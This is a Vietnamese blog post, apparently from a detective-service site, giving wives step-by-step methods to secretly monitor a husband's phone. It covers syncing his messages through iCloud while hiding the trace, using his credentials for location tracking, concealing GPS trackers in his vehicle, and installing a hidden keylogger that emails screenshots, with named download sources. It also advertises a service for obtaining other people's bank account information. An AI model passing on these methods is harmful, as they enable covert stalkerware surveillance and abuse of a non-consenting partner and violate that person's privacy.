Mách Chị Em 5+ Cách Theo Dõi Chồng Qua Điện Thoại

Trong cuộc sống mọi chuyện đều có thể xảy ra, vì thế người chồng mà bạn đầy tin tưởng bỗng ngoại tình thì cũng không quá bất thường. Học thuộc ngay 5 cách theo dõi chồng qua điện thoại dưới đây khi chồng mình có dấu hiệu bất thường nhé!

Theo dõi tin nhắn trên iphone

Cách cơ bản nhất để theo dõi chồng qua điện thoại đó là xem được mục tin nhắn của chồng. Đăng nhập vào imess điện thoại của chồng bằng tài khoản icloud của mình. Toàn bộ tin nhắn của chồng sẽ được hiển thị toàn bộ trên máy bạn. Có một nhược điểm của cách này đó là máy chồng cũng nhận được tin nhắn của bạn vì đồng bộ icloud vì thế bạn có thể chọn cách tháo sim bỏ qua máy khác để không bị phát hiện.

Xem thêm: Dịch vụ lấy thông tin tài khoản ngân hàng

Cách theo dõi chồng qua điện thoại
Cách theo dõi chồng qua điện thoại 

Theo dõi tin nhắn trên Android

Đối với những bạn dùng các điện thoại khác hệ điều hành Android thì có thể cài các app đồng bộ tin nhắn qua gmail. Bạn truy cập mightytex.net/app để sử dụng. Toàn bộ tin nhắn của chồng sẽ được vào máy tính của bạn.

Theo dõi chồng qua số điện thoại viettel

Ứng dụng my Viettel cho phép bạn theo dõi chồng đơn giản nhất. Tải ứng dụng về điện thoại của mình sau đó đăng nhập bằng số điện thoại của chồng và thanh toán cước phí. Lưu ý sau khi cài đặt password nó sẽ hiện mã pin trên điện thoại chồng bạn. Vì thế khi nào cài đặt thì bạn nên giữ máy chồng lấy mã pin xong xóa đi để tránh bị lộ nhé! Phương pháp này sẽ không cho bạn biết được đoạn tin nhắn hay nội dung cuộc trò chuyện nhưng bạn có thể tinh ý để biết được mức độ liên hệ của chồng bạn đến một số lạ nào đó. Đây là cách ít tốn công sức nhưng mang lại hiệu quả rất cao cho công cuộc theo dõi chồng của bạn.

Xem thêm: Dịch vụ thuê vệ sĩ

Theo dõi chồng bằng Find My Iphone

Sử dụng Find my Iphone. Yêu cầu là phải có ID và mật khẩu icloud của chồng. Bạn hoàn toàn có thể cập nhật chồng đang ở đâu. Nếu sử dụng được các này việc bắt quả tang là vô cùng dễ dàng. Lưu ý các tính năng của Find My Iphone:

  • Phát Âm Thanh (Play Sound): Tính năng này sẽ giúp bạn tìm iPhone trong phạm vi gần. Từ đó khi bạn đã xác định được địa điểm chồng bạn với nhân tình. Bạn có thể sử dụng cách này để biết chính xác địa điểm và bất tại trận.
  • Chế độ mất (Lost mode): Để khóa màn hình thiết bị và hiện thông báo đến người đang cầm thiết bị của bạn. Khi chọn chế độ này, nếu máy của bạn không cài mật khẩu khóa màn hình. Hệ thống sẽ yêu cầu bạn nhập mật khẩu theo ý của bạn và để lại số điện thoại. Thường thì tính năng này sẽ không được sử dụng.
  • Xóa Thiết bị (Erase Device): Để bảo mật thông tin quan trọng trên iPhone. Cũng không quan trọng với nhu cầu của bạn lắm.
  • Lưu ý: Nếu thiết bị của bạn ngoại tuyến, ngay khi có kết nối mạng thì các tính năng sẽ được thự hiện trở lại.

Theo dõi bằng điện thoại “cục gạch”

Vậy đối với những anh chồng dùng máy “cục gạch” như Vertu thì sao. Giới thiệu cho bạn ứng dụng Smart Motor Viettel. Tính năng của ứng dụng này là định vị và giám sát hành trình xe. Chỉ cần truy cập vào Internet là có thể biết được xe của chồng đang ở đâu. Tương tự là đồng hồ kiểm soát con cái, bạn có thể bỏ vào cốp xe hay ngụy trang ở chỗ nào đó, mục đích là để biết vị trí của chồng thôi.

>>>Xem thêm:

Đặt định vị xe máy

Giới thiệu đến chị em cách đơn giản nhất để theo dõi ngoại tình đơn giản nhất. Ai cũng có thể làm được là gắn thiết bị định vị GPS vào phương tiện xe máy, ô tô của chồng. Từ đó quản lý giám sát được chồng đi đâu, ở đâu. Theo dõi chồng ngoại tình bằng thiết bị theo dõi xe máy là tương đối dễ dàng và tiện lợi. Bạn có thể biết chính xác vị trí hiện tại đang ở đâu, đang dừng hay đang di chuyển, di chuyển với vận tốc bao nhiêu, dừng trong bao lâu, xem lại lịch sử di chuyển trong vòng 90 ngày…

Xem thêm >> Dịch vụ thám tử Định vị số điện thoại người khác

Cách theo dõi chồng
Định vị xe máy

Cài đặt keylog và chụp màn hình tự động

Cách cài đặt keylog trên điện thoại, ghi lại toàn bộ thao tác bàn phím trên điện thoại của chồng bạn. Hệ thống sẽ gửi ảnh chụp màn hình về mail của bạn mỗi 5 phút. Chỉ áp dụng cho điện thoại Iphone cài Jailbreak còn điện thoại Android thì không cần thiết.

  • Điện thoại Android truy cập trực tiếp vào đường link dl.amobilespy.com 
  • Còn đối với Iphone thì phải qua Cydia chứ không tải trực tiếp được. Đối với những Iphone chưa được Jailbreak thì bạn phải tốn phí. Sau khi có Jailbreak, điện thoại của bạn sẽ có Cydia. Tiếp tục vào Cydia và search tweak: ikeyloger monitor. Sau đó bạn install – confirm và respring lại máy. Bây giờ Ikeylogger của b đã được cài đặt ở chế độ ẩn. Các chế vào safari và gõ dòng này http://localhost:8888 các ảnh sẽ được gửi về tại đây sau 5-10 phút.

Trên đây là toàn bộ những cách theo dõi chồng qua điện thoại cơ bản mà chị em có thể tham khảo. Hy vọng với những chia sẻ này sẽ giúp ích cho bạn trong công cuộc giữ gìn hạnh phúc gia đình.

>> Xem thêm:

Trả lời

Email của bạn sẽ không được hiển thị công khai.